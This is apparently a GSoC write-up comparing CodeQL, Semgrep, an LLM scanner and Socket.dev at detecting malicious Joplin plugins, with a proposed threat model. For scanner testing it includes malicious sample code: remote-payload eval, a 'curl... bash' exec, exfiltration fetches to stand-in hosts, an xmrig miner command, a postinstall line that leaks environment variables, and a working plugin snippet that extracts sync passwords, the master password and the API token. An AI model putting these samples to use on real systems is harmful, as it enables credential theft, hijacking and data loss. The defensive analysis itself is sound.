Plugin Security Tool Comparison -- CodeQL, Semgrep & Gemini CLI

Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.


The Tools

CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.

Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.

Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.


TESTINGS :

Semgrep Scan โ€” joplin-plugin-jarvis

No custom rules were written everything the scanner found out was on it own rules.

File Rule Line Issue
src/commands/chat.ts Non-literal RegExp 274 new RegExp(nc, 'g') โ€” dynamic regex built from variable, vulnerable to ReDoS
src/commands/chat.ts Non-literal RegExp 274 new RegExp(prompt_override) โ€” same line, second dynamic argument flagged
src/commands/notes.ts Unsafe format string 157 console.debug(\Skipping note ${noteId}`)` โ€” variable in log string
src/models/models.ts Unsafe format string 726 console.info(\Jarvis: Loaded ${this.embeddings.length}...`)` โ€” variable in log string
src/research/papers.ts Unsafe format string 296 console.debug(\Error processing paper ${i}`)` โ€” variable in log string
src/research/wikipedia.ts Unsafe format string 169 console.debug(\Error processing Wikipedia page ${i}`)` โ€” variable in log string
src/utils.ts Non-literal RegExp 182 new RegExp(patterns.join(''), 'is') โ€” dynamic regex from joined array, vulnerable to ReDoS

OBSERVATION :
The "Unsafe format string" Findings are 100% false positives particaularly caused by javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rules excluding them removed this alert.
The "Non-literal RegExp" makes the plugin vulnerable to ReDoS attacks, but that is also not something we are looking for in the plugin. This one is caused by the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rules.

After excluding both of these rules I ran the test again on plugin-conflict-resolution, but I added custom test malicious code on it :

File Rule Line Issue
src/vulnerabilities.ts react-insecure-request 17 Unencrypted request over HTTP detected (axios.get('[http://malicious.com/code.js](http://malicious.com/code.js)')).
src/vulnerabilities.ts eval-detected 18 Detected the use of eval(). May be a code injection vulnerability.
src/vulnerabilities.ts react-insecure-request 27 Unencrypted request over HTTP detected (fetch('[http://malicious.com/steal-db](http://malicious.com/steal-db)')).
src/vulnerabilities.ts react-insecure-request 43 Unencrypted request over HTTP detected (axios.post('[http://malicious.com/steal-notes](http://malicious.com/steal-notes)')).
src/vulnerabilities.ts weak-symmetric-mode 49 Weak cryptographic mode detected (createCipheriv('aes-256-cbc')). Recommend AES-256-GCM.
src/vulnerabilities.ts react-insecure-request 68 Unencrypted request over HTTP detected (fetch('[http://malicious.com/exfiltrate-export](http://malicious.com/exfiltrate-export)')).

The scanner is still running on pure self rules, It did catch few of the things which it should catch but missed many. Here is the list of the things he missed :

Threat Category Code / Attack Mechanism Scanner Status Why it happened
Data Exfiltration fetch() / axios to malicious.com :white_check_mark: Caught Flagged by react-insecure-request. The scanner correctly identified unauthorized HTTP network traffic.
Remote Code Execution eval(remoteCode.data) :white_check_mark: Caught Flagged by eval-detected. The scanner knows that executing dynamic strings is a massive security risk.
System Command Execution child_process.exec('curl... bash') :cross_mark: Missed Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access fs.readFileSync & fsExtra.removeSync :cross_mark: Missed Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor net.createServer(...) :cross_mark: Missed Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware joplin.data.put (encrypting existing notes) :cross_mark: Missed The scanner has no knowledge of Joplin's custom API or what joplin.data.put does.
Joplin API: Malicious Interop joplin.interop.registerExportModule :cross_mark: Missed The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observation shows exactly 2 things :

  • Semgrep is completely unaware of what the Joplin API's are.

  • Semgrep is completely unaware of that the code he is scanning is of a plugin. It is written in ts/js but it should not do everything that a standard node.js code does like - fs.readFileSync & fsExtra.removeSync (reading and deleting files) , child_process.exec('curl... bash') (run system command), etc. But even if they do so for a good reason, it should be flagged once so the human reviewer can check whats it actually doing.


CodeQLScan โ€” joplin-plugin-jarvis

Similarly for CodeQL no custom rules were written it is doing exactly what it is made to do

File Rule Line Issue
models/openai.ts Incomplete URL substring sanitization 19 'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.
models/openai.ts Incomplete URL substring sanitization 26 'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.
utils.ts Bad HTML filtering regexp 374 This regular expression does not match script end tags like </script>.
research/pubmed.ts Double escaping or unescaping 381 This replacement may produce & characters that are double-unescaped.
research/wikipedia.ts Incomplete multi-character sanitization 125 This string may still contain <script, which may cause an HTML element injection vulnerability.
utils.ts Incomplete multi-character sanitization 373 This string may still contain <style, which may cause an HTML element injection vulnerability.
utils.ts Incomplete multi-character sanitization 373 This string may still contain <script, which may cause an HTML element injection vulnerability.

RESULT : Keeping it short, CodeQL gave better findings than Semgrep. But every result it gave except the model/ folder were XSS, which is explicitly stated by laurent that we are not looking for.
The two findings in the model/ folder were of SSRF which can be usefull as a user can trick the app by adding 'azure.com' and 'api.anthropic.com' in a custom malicious url.
Though it is not something particularly "Malicious" in the Jarvis plugin so not usefull for us.

After excluding the XSS and SSRF rules from the CodeQl original rules, I ran the test on plugin-conflict-resolution, but with added custom test malicious code on it :

File Vulnerability Line Issue
lib/codemirror/mode/markdown/markdown.js Inefficient regular expression 549 This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='.
vulnerabilities.ts Download of sensitive file through insecure connection 17 Download of sensitive file from HTTP source.

"Inefficient regular expression" is also a ReDoS case which we are not actually looking for.
Hence, out of all the added code, CodeQl falgged :

Threat Category Code / Attack Mechanism CodeQL Status Why it happened
Data Exfiltration fetch() / axios to malicious.com :cross_mark: Missed CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks.
Remote Code Execution axios.get + eval(remoteCode.data) :white_check_mark: Caught Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the eval() itself.
System Command Execution child_process.exec('curl... bash') :cross_mark: Missed Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access fs.readFileSync & fsExtra.removeSync :cross_mark: Missed Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor net.createServer(...) :cross_mark: Missed Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware joplin.data.put (encrypting existing notes) :cross_mark: Missed The scanner has no knowledge of Joplin's custom API or what joplin.data.put does.
Joplin API: Malicious Interop joplin.interop.registerExportModule :cross_mark: Missed The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observation also shows exactly 2 things :

  • CodeQl is completely unaware of what the Joplin API's are.

  • CodeQl is completely unware of that the code he is scanning is of a plugin and should not do everything that a normal TS/JS code should do


Further architecture analysis :

Any Joplin plugin can call joplin.settings.globalValues() with no restrictions and retrieve all sync credentials, the E2E master password, and the API token , using only the official plugin API, with zero exploits or sandbox escapes.

import joplin from "api";

joplin.plugins.register({
  onStart: async function () {
    const result = joplin.settings.globalValues([
      "sync.5.password",
      "sync.6.password",
      "sync.8.password",
      "sync.9.password",
      "sync.10.password",
      "encryption.masterPassword",
      "api.token",
      "encryption.passwordCache",
    ]);

    joplin.data.post(["notes"], null, {
      title: "test note for hacker",
      body: JSON.stringify(await result),
    });
  },
});

Additionally, the dev can get access to both the security key and master password :

First I used joplin.data.get(['master_keys']) which is a defined method to get the master_keys, but this was blocked by a regex filter that does not allow "_" in it :

for (const p of path) {
    if (!this.pathSegmentRegex_.test(p)) {
          throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
     }
}

So, I used "syncInfoCache" and it worked and I got the key + master_password.

Joplin settings and plugins I believe currently work on the thinking that "If a user has installed a plugin he trust it", i.e the plugin gets access to all the settings defined. Since, we are moving from a trust-by-default to a review-by-default model, It will be good to have a flag about this specific bypass.
A plugin can read the secret and pipe it down through a network request silently without the user ever even knowing or it can even read both key and password of the user.

Update to threat model :

What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must flagged for review.

Known Attack Vectors:

  • Calling joplin.settings.globalValue or globalValues explicitly targeting "syncInfoCache" , "encryption.masterPassword" , "sync.*.password", "api.token" , "encryption.cachedPpk" , "encryption.passwordCache", should be once flagged for review.

  • Additionally if the data is read and piped down to a network request, saved silently to a note, written to the local file system, passed to a system command (child_process), or injected into an external webview, it should be marked as critical and a must-review case.

  • If both "encryption.masterPassword" and "encryption key" are being fetched by a plugin it should also be marked for a review.


Threat Model :

All of the above observation shows the exact need of writing custom rules for the tool and defining a threat model, using which the tools would know what we have to detect.
Since, human review is the mandatory part of the pipeline we have to write a threat model that covers both "This is bad" and "This may be bad" scenarios, so the reviewer know what he has to review.
Tools by themselves do not know what a person want to see in there code flagged out. Using the custom rules / threat model, we will tell the tool, we want to see these things flagged out so that the human reviewer can read the report in the issue and have a quick check on it.
Following is the threat model that I have defined till now with the exact reason why each of the things should be flagged :

Phase 1: Critical Threats

  1. Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of eval() or bypassing joplin.require to use native require('child_process') with remote payloads.

  2. Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling joplin.settings.globalValue(s) targeting syncInfoCache, encryption.masterPassword, encryption.cachedPpk, encryption.passwordCache, sync.*.password, sync.*.auth, sync.*.context, sync.5.username, sync.6.username, sync.9.username, sync.10.username, sync.10.userEmail, sync.userId, or clientId. This is critical if the data is piped to a network request, written to disk, passed to child_process, or injected into an external webview.

  3. Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of @electron/remote.

  4. Archive Extraction Attack : Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing database.sqlite or config files. Attack Vectors: Usage of joplin.fs.archiveExtract() where either argument originates from user input or a remotely fetched source. This should be flagged for a reviewer to see what the zip extraction is actually doing?

  5. Mass Data Destruction: Iterating through notes or folders and permanently destroying the user's database. Attack Vectors: joplin.data.delete() appearing inside a loop iterating over joplin.data.get(['notes']) or joplin.data.get(['folders']). LLM should check the purpose of the iteration and report it respectively.

  6. Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real-time and exfiltrating it. Attack Vectors: onNoteContentChange or onNoteChange combined directly with network requests (fetch, axios).

  7. Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (database.sqlite), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of native fs or joplin.require('fs-extra') targeting __dirname + '/index.js' or ~/.config/joplin-desktop.

  8. Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of net.createServer().

  9. Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data + swapping it. Attack Vectors: Background loops calling joplin.clipboard.readText() and joplin.clipboard.writeText().

  10. Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via child_process or hidden BrowserWindows.

  11. Native Module Imports : Bypassing the joplin.require() API to gain full host machine access. Attack Vectors: Direct imports of child_process, net, os, dgram via require(), window.require(), or TypeScript import statements.

  12. Silent Data Persistence : Storing execution commands or exfiltrated data invisibly. Attack Vectors: Reading joplin.data.userDataSet() and passing the result directly to eval(), exec(), or fetch().

Phase 2: Dual-Use Data Flows

  1. Command Execution: Running terminal commands via child_process. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script.

  2. Data Exfiltration: Using joplin.data.get to bulk-read notes and piping that data into fetch() or axios. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL.

  3. Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors: joplin.data.get piped to joplin.data.put via crypto. The reviewer must verify if this is just a encryption feature or not.

  4. Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors: fetch() or network requests inside a joplin.interop.registerExportModule callback.

  5. Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a joplin.interop.registerImportModule callback.

  6. Remote External Webviews: Creating a UI panel but setting the source to an external URL. Attack Vectors: <iframe src="..."> in panel HTML. The reviewer must verify the trusted status of the external service.

False Positive:

Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.

Note : This threat model mostly contain of data flows, that is why now it is not possible to define any custom rules in semgrep for this, I have given a small study at last of the SAST section to specifically test why semgrep cannot be used anymore
Also few new threats were added after the initial testings so the test below are done on a little less threat model coverage

Here is the report CodeQl gnerated on plugin-conflict-resolution with custom malicious code :

Vulnerability / Rule Description Severity File Position (Line:Col)
Unauthorized Native Module Bypasses Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method. warning /vulnerabilities.ts 2:8 - 2:25
Network Backdoors Detects local servers being spun up which may indicate a backdoor. warning /vulnerabilities.ts 30:20 - 33:6
Data Exfiltration (Notes to Network) Detects Joplin notes data flowing to external network requests. warning /vulnerabilities.ts 43:58 - 43:62
Direct File System / Sandbox Escape Detects hardcoded sensitive paths or traversals flowing into file system APIs. warning /vulnerabilities.ts 26:36 - 26:41
Secret and Key Theft Detects sensitive environment variables or settings data exfiltrated via network requests. warning /vulnerabilities.ts 22:17 - 22:65

CodeQL generated a good report + also was able to catch cross file code and gave exact lines to look for. The threat model seems to work great as it enhanced the codeQL result a lot :

Threat Category Code / Attack Mechanism Status
Data Exfiltration fetch() / axios to malicious.com :white_check_mark: Caught
Remote Code Execution axios.get + eval(remoteCode.data) :white_check_mark: Caught
System Command Execution child_process.exec('curl... bash') :white_check_mark: Caught
Destructive File Access fs.readFileSync & fsExtra.removeSync :white_check_mark: Caught
Network Backdoor net.createServer(...) :white_check_mark: Caught
Joplin API: Ransomware joplin.data.put (encrypting existing notes) :white_check_mark: Caught
Joplin API: Malicious Interop joplin.interop.registerExportModule :white_check_mark: Caught

(It returned clean for jarvis)

RESULT :

CodeQl gave good result when was defined what he has to look for. Though as earlier seen Codeql was not able to identify most of the things we want to see without the custom rules, this means that it is now bound to the "threat model" to generate the report so the only things which we will mostly see in the report are of the "threat model", leaving a huge Zero-Day Blind Spot.


LLM as a scanner :

LLM would be a great tool to use here, as the main problem arising with tools are lack of context of what actually a "joplin plugin api" is and the need for defining a "threat model" to write custom rules for.
As many joplin plugins are made by the community developers, although the "threat model" can be defined, but in future new and new things that a reviewer would want to see in the report will arise.
LLM is not bound to any rule or threat model, although "threat mode" will be prompted, LLM are also actively good enough to report zero day malicious code.

The scan result from gemini 3.1 pro preview with threat model defined on joplin-plugin-jarvis :

The scan result from gemini 3.1 pro preview with threat model defined on plugin-conflict-resolution with custom malicious code :

Threat Category Code / Attack Mechanism LLM Status
Data Exfiltration joplin.data.get -> axios.post() :white_check_mark: Caught
Remote Code Execution axios.get() + eval() :white_check_mark: Caught
System Command Execution child_process (curl... bash) :white_check_mark: Caught
Secret & Key Theft process.env -> fetch() :white_check_mark: Caught
Sandbox Escape / File Access fs (SQLite) / fs-extra (absolute) :white_check_mark: Caught
Network Backdoor net.createServer().listen(1337) :white_check_mark: Caught
Joplin API: Ransomware Read -> crypto.createCipheriv -> Put :white_check_mark: Caught
Joplin API: Malicious Interop registerExportModule -> fetch() :white_check_mark: Caught

The "threat model" seems to be working correctly, the well known joplin-plugin-jarvis which is not malicious was not flagged malicious, the use of fetch() after joplin.notes.get was flagged so a human reviewer can just check if there is nothing wrong.
Additionally, the LLM is not bound to only the threat model. It effectively looks the code and see if there is something that should be flagged, similar to the threat model defined.


More observations :

Why these tests were done?

To verify is the threat model generating any noise? If yes is it usefull and should be added in the threat model?
Additionally, LLM was used to scan + see if there is any flow that a plugin use which should be added to the threat model.

The most popular 4 plugins all passed the LLM and CodeQl scan with a clean result :
Note : The LLM was free to also look for similar malicious code pattern as the threat model

joplin-inline-todo :white_check_mark: Clean
joplin-rich-markdown :white_check_mark: Clean
plugin-templates :white_check_mark: Clean
plugin-yesyoukan:white_check_mark: Clean

CodeQl produced a little noise on plugin-templates :

Issue / Rule Severity File Location Description
Useless regular-expression character escape Error /parser.ts (Line 211, Col 48, Col 63) The escape sequence \S is equivalent to just S. Prepending a backslash to an ordinary character in a string does not have any effect.

This is a code quality finding due to the "*useless-regexp-character-escape*" rule, which is now excluded from the rules.
Tests :
joplin-math-mode :white_check_mark: Clean
joplin-note-tabs :white_check_mark: Clean
joplin-plugin-extra-editor-settings :white_check_mark: Clean
joplin-plugin-quick-links :white_check_mark: Clean
joplin-inline-tags-plugin :white_check_mark: Clean
joplin-plugin-combine-notes :white_check_mark: Clean
joplin-plugin-diff-tool :white_check_mark: Clean
joplin-plugin-table-formatter :white_check_mark: Clean

New updates to threat model after these testings :

  • Self-Modifying Code / Silent Payloads : What it is: The plugin uses fs or fs-extra to rewrite its own source files (e.g., overwriting __dirname + '/index.js') after installation to swap code for malware, bypassing initial CI scans.

  • Cryptojacking / Resource Theft : What it is: Exploiting Node.js integration to use child_process to spawn native mining binaries , or utilizing Web Workers in the hidden BrowserWindow to run crypto-miners in the background.


Now I had all the rules written. I made a file containing dummy code of all the rule senarios to check out how both codeql and LLM would perform :

import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';

const fs = joplin.require("fs-extra");

export async function codeql_test_dynamic_code_execution() {
    const response = await fetch('https://example.com/payload.js');
    const payload = await response.text();
    eval(payload); 
}

export async function codeql_test_secret_theft() {
    const masterPassword = await joplin.settings.globalValue('encryption.masterPassword'); 
    const syncCache = await joplin.settings.globalValue('syncInfoCache');

    await fetch('https://example.com/exfiltrate', {
        method: 'POST',
        body: JSON.stringify({ p: masterPassword, s: syncCache })
    });
}

export async function codeql_test_unauthorized_fs_access() {
    const pluginDir = __dirname; 
    const targetFile = `${pluginDir}/index.js`; 
    fs.writeFileSync(targetFile, "console.log('malware swapped');"); 
}

export async function codeql_test_network_backdoors() {
    const server = net.createServer((c) => { 
        c.write('backdoor active\r\n');
    });
    server.listen(8124); 
}

export async function codeql_test_clipboard_hijacking() {
    const clipContent = await joplin.clipboard.readText(); 
    if (clipContent.includes('wallet')) {
        await joplin.clipboard.writeText('attacker_wallet_address'); 
    }
}

export async function codeql_test_cryptojacking() {
    child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr'); 
}

export async function codeql_test_command_execution() {
    const userCmd = "ls -la";
    child_process.exec(userCmd); 
}

export async function codeql_test_data_exfiltration() {
    const notes = await joplin.data.get(['notes']); 
    await fetch('https://example.com/sync', {
        method: 'POST',
        body: JSON.stringify(notes) 
    });
}

export async function codeql_test_mass_encryption() {
    const notes = await joplin.data.get(['notes']); 
    for (const note of notes.items) {
        const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
        let encrypted = cipher.update(note.body, 'utf8', 'hex');
        encrypted += cipher.final('hex');
        await joplin.data.put(['notes', note.id], null, { body: encrypted }); 
    }
}

export async function codeql_test_backup_hijacking() {
        await joplin.interop.registerExportModule({
            format: 'custom',
            description: 'Custom Export',
            target: fs.Directory,
            isNoteArchive: false,

            onInit: async (context: any) => {
                const data = context.exportData; 
                await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
            },

            onProcessItem: async (context: any, itemType: number, item: any) => {},
            onProcessResource: async (context: any, resource: any, filePath: string) => {},
            onClose: async (context: any) => {}
        });
    }

export async function codeql_test_remote_webviews() {
    const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`; 
    const view = await joplin.views.panels.create('panel_1');
    await joplin.views.panels.setHtml(view, htmlContent); 
}

Result :

# Threat Phase Maliciousness LLM Scan CodeQL
1 Dynamic Code Execution 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
2 Secret & Key Theft 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
3 Unauthorized FS / Self-Modification 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
4 Network Backdoor 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
5 Clipboard Hijacking 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
6 Cryptojacking / Binary Dropping 1 :red_circle: Critical :white_check_mark: Caught :white_check_mark: Caught
7 Command Execution 2 :orange_circle: High :white_check_mark: Caught :white_check_mark: Caught
8 Data Exfiltration (notes โ†’ network) 2 :orange_circle: High :white_check_mark: Caught :white_check_mark: Caught
9 Mass Encryption / Ransomware 2 :orange_circle: High :white_check_mark: Caught :white_check_mark: Caught
10 Silent Backup Hijacking 2 :orange_circle: High :white_check_mark: Caught :white_check_mark: Caught
11 Remote Webview Scripts 2 :yellow_circle: Medium :white_check_mark: Caught :white_check_mark: Caught

Originally, only LLM caught all the threats. Codeql rule were extreamly useless and caught only (3/11) threats. Several changes had to be done to make Codeql catch all the threats.

Trade offs : CodeQl is not good enough to catch complex data flows like how data was extracted and converted to an object and then used JSON.stringify on. Here codeql actually lost the track of the data and did not knew the new object contains the data we are following.

What had to be done to solve it? : Several new rules were added and old rules were updated to simply check :

  • does data.get() and fetch appear in same function?
  • does data.get() + crypto call + joplin.data.put() happens in the same file?
  • fetch() or file write inside a registerExportModule callback
    etc....

Though these rules solved the problem right now, I am sure there are still a lot of blind spots which are left in CodeQl.
Additionally, codeql also caught these extra things :

Threat / Finding What it is
Weak Cryptography (CBC mode) The code uses an outdated encryption algorithm mode (like AES-CBC) instead of modern authenticated encryption (like AES-GCM).
Insecure Network Traffic (HTTP) The plugin is making network requests (fetching data or sending user info) over plain http:// rather than secure https://.
ReDoS (Inefficient Regex) Regular Expression Denial of Service. The code contains a poorly structured regex pattern that requires exponential time to evaluate certain complex strings.

All of these were code quality noise.

Additional test for Semgrep :

Click to expand

Ran semgrep on same test file :

Rule ID / Finding Description / Threat
eval-detected Detected the use of eval(). Potential code injection vulnerability.
joplin-plugin-dynamic-code-execution Remote or dynamically-loaded data flows into dynamic code execution (RCE).
joplin-plugin-master-password-access MANUAL REVIEW REQUIRED: Plugin reads the master encryption password.
joplin-plugin-sync-cache-access MANUAL REVIEW REQUIRED: Plugin reads the sync info cache (encryption keys/sync metadata).
joplin-plugin-secret-key-theft Sensitive Joplin credentials flowing to a network/file/process/IPC sink.
joplin-plugin-unauthorized-fs-write A path derived from __dirname flows to a file write (Self-modification).
joplin-plugin-network-backdoor A server created via createServer() flows to .listen() (Network port opened).
joplin-plugin-clipboard-hijacking Data flows into clipboard.writeText() (Clipboard hijacking).
joplin-plugin-command-execution Data flows into shell command execution. Requires review.
joplin-plugin-cryptojacking A string matching known miners/mining pools flows into child_process (Cryptojacking).
joplin-plugin-command-execution Data flows into shell command execution. Requires review.
joplin-plugin-data-exfiltration Joplin note data read via joplin.data.get() flows to a network request.
javascript.crypto.weak-symmetric-mode Detected the use of a weak cryptographic mode (aes-256-cbc).
javascript.crypto.symmetric-hardcoded-key A secret is hard-coded in the application.
joplin-plugin-ransomware Ransomware pattern: reads notes, encrypts them, and writes them back.
joplin-plugin-ransomware-taint Encrypted data flows into joplin.data.put().
joplin-plugin-backup-hijacking Network or file write detected inside a registerExportModule() callback.
joplin-plugin-remote-webview An external URL flows into a Joplin webview via setHtml().

Semgrep caught everything.
How ? : Specifically, the rules written for it were not dynamic neither flow tracking, most of them were direct, like if you see eval report as it is a AST matching scanner. Since, the file was specifically written for testing it caught everything usefull. But using the same ruleset on normal pluggin will cause huge amount of noise. For example using semgrep rule on Jarvis :

File Lines What the code is actually doing
src/chatPanel.ts 94 Building the HTML for the main Jarvis chat input UI (<div class="jarvis-chat-panel">).
src/commands/ask.ts 30, 97, 127 Building HTML forms for the "Ask Jarvis" and "Edit with Jarvis" popup dialogs.
src/commands/research.ts 52 Building the HTML form for the "Research with Jarvis" dialog.
src/models/models.ts 1317 Injecting local CSS styles (<style>) for a preview window.
src/ux/modelManagement.ts 435 Calling a helper function build_dialog_html to render the model management UI.
src/ux/panel.ts 27, 51, 91 Building the HTML for the sidebar panels (showing related notes, search boxes, and progress bars).

They all are useless noises.
Similarly calling the codeql new rules on jarvis gave no noise.

Conclusion :

Since, the threat model is more of a data flow kind now, AST scanner tools like semgrep , sonarQube (primary code quality scanner), etc does not have ability to scan them. Even if extra complex peice of custom rules are written, the main trade off will be that they will be doing something they are not designed for, hence a huge blind spot will always be left for the senarious which are not kept in mind while writting the rules + they will produce a lot of noise on normal plugins too.

The tool which stand chance was CodeQl, after several tests I came to realize the same things as the above tools, even though it has ability of taint tracking, there will always be blind spots for the senarious not taken in mind while writting the rules.

The LLM performed well in all of these cases, not only it was accurate at scanning.. It seldomly warned me about new things which are potential warning too in the plugins.
I still beleive LLM would be a great call for use in this pipeline.


SCA TOOL (socket.dev) :

Snyk , Semgrep SCA and npm audit are just general CVE database scanning tools, as of this pipeline we need something which can actually check if the package is malicious or not.
The tool which is popular for this use case is socket dev.

The first thing I did was running the socket scan on top 10 plugins from the plugin website of joplin.
Why? : To determine the noise level and also previously, I have tested socket.dev using custom malicious postinstall etc but it did not gave any result because it works on official npm published package only.

One thing to keep in mind while veiwing these result is that there are 3 tier in socket.dev low, warn and critical. I have completely filtered out the low findings.

Here are the result on the top 10 plugins :

1. joplin-inline-tags-plugin :

Package Version Alert Type Severity (Policy)
fast-xml-parser 4.2.5 criticalCVE warn
form-data 2.3.3 criticalCVE warn
form-data 2.5.1 criticalCVE warn
form-data 4.0.0 criticalCVE warn
entities 4.5.0 obfuscatedFile warn
immer 7.0.15 criticalCVE warn

2. joplin-inline-todo :

Package Version Alert Type Severity (Policy)
entities 4.5.0 obfuscatedFile warn
handlebars 4.7.8 criticalCVE warn

3. joplin-math-mode :

Package Version Alert Type Severity (Policy)
- - No alerts detected -

The scan completed successfully and detected 0 alerts. The alerts object is entirely empty.

4. joplin-plugin-combine-notes :

Package Version Alert Type Severity (Policy)
form-data 2.3.3 criticalCVE warn
form-data 4.0.0 criticalCVE warn
form-data 2.5.1 criticalCVE warn
entities 4.5.0 obfuscatedFile warn
immer 7.0.15 criticalCVE warn

5. joplin-plugin-diff-tool :

Package Version Alert Type Severity (Policy)
entities 4.5.0 obfuscatedFile warn

6. joplin-plugin-extra-editor-settings :

Package Version Alert Type Severity (Policy)
entities 4.5.0 obfuscatedFile warn
form-data 4.0.1 criticalCVE warn

7. joplin-plugin-jarvis :

Package Version Alert Type Severity (Policy)
entities 4.5.0 obfuscatedFile warn
markdown-it 14.2.0 obfuscatedFile warn
markdown-it 14.2.0 obfuscatedFile warn

8. plugin-templates :

Package Version Alert Type Severity (Policy)
handlebars 4.7.8 criticalCVE warn

9. plugin-yesyoukan :

Package Version Alert Type Severity (Policy)
entities 4.5.0 obfuscatedFile warn

10. joplin-plugin-quick-links :

Package Version Alert Type Severity (Policy)
fast-xml-parser 4.2.5 criticalCVE warn
form-data 2.3.3 criticalCVE warn
form-data 4.0.0 criticalCVE warn
form-data 2.5.1 criticalCVE warn
entities 4.5.0 obfuscatedFile warn
immer 7.0.15 criticalCVE warn

Observation :

The result was full of false-positives, every result which was generated was a false positive.

entities : obfuscatedFile Appeared in 8/10 plugins - This is a machine-generated HTML character decoding lookup table. Socket.dev cannot distinguish between intentionally obfuscated malware and auto-generated data tables.

form-data : criticalCVE Appeared in 5/10 plugins - it is a dependency pulled in through @joplin/* packages.
Is there a way to silent it? : The only possible ways are either silent all packages one by one that can be pulled (not feasible) another is to add CVE and obfuscatedFile in ignored list, but then we won't get usefull info too (not feasible)

markdown-it : obfuscatedFile Flagged only in Jarvis - These are standard minified browser bundles. False positive

immer, fast-xml-parser , handlebars : criticalCVE - Known CVEs in older versions of packages. Also, these are not Joplin-specific and are of warn category. This is not something we are looking for neither they do us any good, also few of them are from @joplin/*.

Summary

Plugin Alerts Real Threats False Positives
joplin-inline-tags-plugin 6 0 6
joplin-inline-todo 2 0 2
joplin-math-mode 0 0 0
joplin-plugin-combine-notes 5 0 5
joplin-plugin-diff-tool 1 0 1
joplin-plugin-extra-editor-settings 2 0 2
joplin-plugin-jarvis 3 0 3
plugin-templates 1 0 1
plugin-yesyoukan 1 0 1
joplin-plugin-quick-links 6 0 6
Total 27 0 27

Then I ran the test again on Jarvis with a new custom dependency :

"akshajrawat.utils": "^1.0.1",

that contained :

 "postinstall": "node -e \"require('https').get('https://example.com/collect?k='+process.env.HOME+'&u='+process.env.USERNAME)\""

No new result was found.

Conclusion :

Every single alert across all 10 plugins is either a CVE in a trusted Joplin dependency or a false positive obfuscation flag on generated/minified files. A maintainer reading these reports would find zero actionable information.

Socket.dev has no @joplin/* filter and surfaces the same Joplin-owned CVEs on every plugin.

As shown in the proposal test , a purpose-built malicious postinstall script was completely missed + the older tests showed the same result how these custom packages were missed.

What we can do :
Not integrate Socket.dev. The LLM SCA summary (install scripts + non-registry sources + direct dependency typosquatting check) covers the actual threat surface more accurately with significantly less noise :

1. Flag: Install Scripts Detected (postinstall, preinstall)

  • The Threat: The plugin or a dependency is trying to execute terminal commands on the user's machine the moment it is downloaded.

The Reviewer's Action: Hard Reject.
In Joplin, there is almost zero reason for a plugin to run shell commands during installation.

2. Flag: Non-Registry Sources (Git URLs)

  • The Threat: The package.json points to a URL like github:someuser/somerepo or an HTTP link instead of an official npm version.

The Reviewer's Action: Block & Demand Migration.
Reviewer can refuses to approve the plugin because it breaks the security scanner's ability to track it.

